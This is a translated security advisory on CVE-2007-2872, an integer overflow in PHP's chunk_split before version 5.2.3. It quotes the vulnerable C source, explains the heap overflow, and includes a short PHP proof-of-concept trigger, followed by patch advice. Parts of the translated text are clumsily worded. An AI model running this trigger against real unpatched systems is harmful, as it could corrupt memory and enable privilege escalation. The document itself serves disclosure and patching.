Affected systems:
PHP PHP < 5.2.3
Unaffected systems:
PHP PHP 5.2.3
Description:
---------------------- -------------------------------------------------- --------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872
PHP is a popular WEB server-side programming language.
The chunk_split function in PHP has an integer overflow vulnerability when processing malformed parameters. Local attackers may use this vulnerability to escalate their own privileges.
Line 1963 of the chunk_split function in PHP attempts to allocate sufficient memory size for the function result, but uses the srclen and chunklen parameter chunks without performing any checks. If the block and endlen of the value are larger than 65534 bytes, an integer overflow will be triggered and the wrong memory size will be allocated, causing a heap overflow.
ext/standard/string.c:
1953 static char *php_chunk_split(char *src, int srclen, char *end,
int endlen, int chunklen, int *destlen)
1954 {
1955 char *dest;
1956 char *p, *q;
1957 int chunks; /* complete chunks! */
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
sizeof(char), 0);
1964
1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966 memcpy(q, p, chunklen);
1967 q += chunklen;
1968 memcpy(q, end, endlen);
1969 q += endlen;
1970 p + = chunklen;
1971 }
<*Source: Gerhard Wagner
Link: http://marc.info/?l=bugtraq&m=118071054000708&w=2
http://www.php.net/releases/5_2_3.php
http://secunia.com/advisories/25456/
*>
Test method:
-------------------------------- -------------------------------------------------- -
Warning
The following procedures (methods) may be offensive and are for security research and teaching purposes only. Use at your own risk!
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>
Suggestion:
------------------------------------------------- ----------------------------------------
Manufacturer patch:
PHP
---
Current manufacturer An upgrade patch has been released to fix this security issue. Please download it from the manufacturer's homepage:
http://www.php.net/downloads.php#v5
Article from: NSFOCUS Technology
The above introduces the split function chunk_split function integer overflow vulnerability analysis under PHP52, including the content of the split function. I hope it will be helpful to friends who are interested in PHP tutorials.